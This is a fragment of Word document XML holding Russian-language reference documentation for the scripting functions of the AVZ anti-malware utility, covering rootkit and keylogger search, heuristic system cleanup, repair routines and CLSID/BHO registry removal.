      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>меняется для упрощения интеграции Boot Cleaner с типовыми скриптами.</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SearchRootkit(UserModeLock, KernelModeLock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UserModeLock – управляет блокировкой руткитов UserMode (false – тол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ко анализ, true – противодействие)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>KernelModeLock – управляет блокировкой руткитов KernelMode (false – только анализ, true – противодействие)</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lastRenderedPageBreak/>
        <w:t>procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SearchKeylogger;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Осуществляет поиск кейлоггеров и троянских DLL. Эта операция прои</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>водится в ходе сканирования, а данная функция позволяет выполнить ее по м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ре надобности индивидуально, в любом месте скрипта. Результаты анализа п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мещаются в протокол .</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ExecuteSysChkEV;</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эвристическую проверку системы (ЭПС). По умолчанию э</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ристическая проверка производится в ходе сканирования компьютера при усл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вии, что установлен переключатель "Эвристическая проверка системы" на главном окне. Результаты проверки заносятся в протокол.</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ExecuteSysChkIPU;</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поиск потенциальных уязвимостей (ИПУ). По умолчанию п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>иск потенциальных уязвимостей ведется в ходе сканирования компьютера при условии, что установлен переключатель "Поиск потенциальных уязвимостей" на главном окне. Результаты проверки заносятся в протокол.</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ExecuteSysCheck(AFileName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Выполнение исследования системы с сохранением HTML протокола в указанный файл (одновременно с созданием HTML протокола создается соде</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>жащий его zip одноименный файл).</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procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ExecuteSysCheckEx(AFileName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; ACheckMode : dword; </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color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AScanAllSvc : boolean; ARepParams : dword);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Расширенный аналог </w:t>
      </w:r>
      <w:hyperlink r:id="rId138" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>ExecuteSysCheck</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.Содержит ряд параметров, позв</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ляющих выполнить тонкую настройку исследования системы и формирования протокола.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ExecuteSysClean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эвристическую чистку системы. Эвристическая чистка сост</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ит в анализе реестра и поиске ссылок на удаленные файлы. Список файлов по умолчанию формируется автоматически – он пополняется при каждом вызове функции </w:t>
      </w:r>
      <w:hyperlink r:id="rId139" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>DeleteFile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. После выполнения эвристической чистки системы этот список очищается автоматически.</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SysCleanAddFile(AFileName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Добавляет файл с именем AFileName в список, используемый функцией эвристической чистки системы </w:t>
      </w:r>
      <w:hyperlink r:id="rId140" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>ExecuteSysClean</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Добавление файла в список при помощи SysCleanAddFile позволяет автоматизированно удалить следы файлов, стертые ранее вручную или при помощи другой антивирусной пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">граммы.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SysCleanDelFilesList;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Очищает список файлов, ссылки на которые будет искать и удалять по</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>система эвристической чистки системы. Очистка пустого списка (и, как сле</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ствие, повторные вызовы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>функции) не являются ошибкой.</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SysCleanGetFilesList(AFileList : TStringList);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список удаленных файлов (а так–же файлов, добавленных в список удаленных принудительно командами </w:t>
      </w:r>
      <w:hyperlink r:id="rId141" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>SysCleanAddFile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) в массиве строк AFileList. Массив строк должен быть предварительно инициализирован. Данная функция может применяться для реализации собственных процедур эвристич</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ской чистки для удаленных скриптом файлов.</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SysCleanSetFilesList(AFileList : TStringList);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Заменяет текущий список удаленных файлов (сформированный в ходе удаления файлов в скрипте и вызовов </w:t>
      </w:r>
      <w:hyperlink r:id="rId142" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>SysCleanAddFile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) на массив строк AFileList. Массив строк должен быть предварительно инициализирован и з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">полнен. Данная функция может применяться в случае реализации собственных процедур удаления файлов или совместно с </w:t>
      </w:r>
      <w:hyperlink r:id="rId143" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>SysCleanGetFilesList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</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ExecuteRepair(ID : integer)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микропрограмму восстановления системы с указанным ном</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ром. Номера микропрограмм можно посмотреть в диалоговом окне "Восст</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">новление системы". Функция возвращает true в случае успешного выполнения указанной микропрограммы и false в случае ошибки.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ExecuteStdScr(ID : integer)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скрипт из раздела "Стандартные скрипты" с указанным ном</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ром. Номера скриптов можно посмотреть в диалоговом окне "Стандартные скрипты". Функция возвращает true в случае успешного выполнения указанной микропрограммы и false в случае ошибки.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ExecuteScript(AScriptFile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Загрузка текста скрипта из текстового файла с именем AScriptFile и его выполнение. На время выполнение скрипта работа вызывающего скрипта пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>останавливается. Возвращает true в случае, если вызов был успешен и false в случае ошибки (ошибка возникает в случае, если файл не найден или скрипт содержит синтаксические ошибки, или в ходе выполнения скрипта возникла неустранимая ошибка).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ShutdownWindows(AForce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Завершение</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>работы</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>системы</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Флаг AForce управляет режимом заверш</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния работы – если он равен true, то завершение работы производится в уск</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ренном (форсированном) режиме, без рассылки приложениям сообщений о том, что система завершает работу. Завершение работы в формированном режиме может привести к потере открытых документов и некорректному завершению работы программ.</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RebootWindows(AForce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lastRenderedPageBreak/>
        <w:t>Перезагрузка</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>системы</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Флаг AForce управляет режимом перезагрузки – если он равен true, то завершение работы производится в ускоренном (форс</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">рованном) режиме, без рассылки приложениям сообщений о том, что система завершает работу.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CheckFile(AFileName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)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проверку указанного файла при помощи AV базы и базы бе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>опасных AVZ</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GetLastCheckTxt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текстовое описание объекта, детектированного файловым сканером. Имеет смысл только после вызова </w:t>
      </w:r>
      <w:hyperlink r:id="rId144" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>CheckFile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, возвратившего код 1 или 2. Во всех остальных случаях функция возвращает пустую строку.</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CLSIDExists(CLSID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Проверяет, существует ли указанный CLSID в реестре. CLSID рекоме</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">дуется передавать без фигурных скобок. </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Если CLSID обнаружен в реестре, то возвращается true. Иначе</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – false.</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CLSIDFileExists(CLSID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true, если указанный CLSID есть в реестре, по его анализу удалось найти связанный с CLSID файл и этот файл существует на диске. Во</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вращает false в любой другой ситуации (нет CLSID, запись CLSID в реестре.</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CLSIDFileName(CLSID : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)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имя файла, соответствующего указанному CLSID или пустую строку, если CLSID не найден в реестре или его анализ не позволил найти имя файла. Функция не проверяет, существует файл на диске или нет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> DelCLSID(CLSID : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удаляет из реестра регистрацию класса с заданным CLSID. Отсутствие класса с указанным CLSID не является ошибкой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удаление регистрации предполагает выполнение следующих операций:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удаление регистрации класса</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удаление интерфейса с таким же CLSID (если он существует)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удаление BHO и панелей расширения IE c данным CLSID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удаление записей ActiveSetup с данным CLSID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удаление расширений проводника с данным CLSID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удаление элементов SharedTaskScheduler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> BHOExists(BHO : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) : boolean;</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Проверяет, существует ли BHO или иное расширение Internet Explorer с указанным CLSID. CLSID рекомендуется передавать без фигурных скобок. Е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ли BHO обнаружен в реестре, то возвращается true. Иначе</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – false.</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DelBHO(BHO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w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> BHO </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
